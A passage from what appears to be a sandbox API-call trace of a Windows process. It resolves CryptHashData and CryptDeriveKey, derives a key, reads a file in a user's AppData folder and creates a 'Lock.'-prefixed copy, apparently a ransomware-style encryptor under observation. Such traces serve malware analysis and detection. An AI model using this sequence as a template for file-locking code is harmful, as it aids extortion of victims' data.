cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0240.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e514d8 [0240.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e514d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0240.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0240.517] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0240.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0240.517] CryptHashData (hHash=0xa872d0, pbData=0x2e54f58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0240.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0240.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.520] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.520] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.520] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.520] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0240.520] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0240.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0240.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e514a8 [0240.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e514a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0240.521] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87410) returned 1 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.521] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0240.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0240.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.522] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0240.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0240.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0240.523] CryptDestroyHash (hHash=0xa872d0) returned 1 [0240.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0240.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0240.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0240.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0240.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0240.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0240.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0240.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0240.525] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/vJXjfUq6n4avnAr.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\vjxjfuq6n4avnar.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0240.525] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.525] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0240.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0240.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0240.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0240.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0240.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0240.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.526] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0240.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0240.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0240.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0240.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0240.527] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.vJXjfUq6n4avnAr.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.vjxjfuq6n4avnar.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0240.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0240.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0240.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0240.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0240.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0240.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0240.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0240.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0240.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe59020 [0240.533] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0240.533] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xccb, lpOverlapped=0x0) returned 1 [0240.535] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0240.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.535] HeapFree (in: hHeap=0x970000, 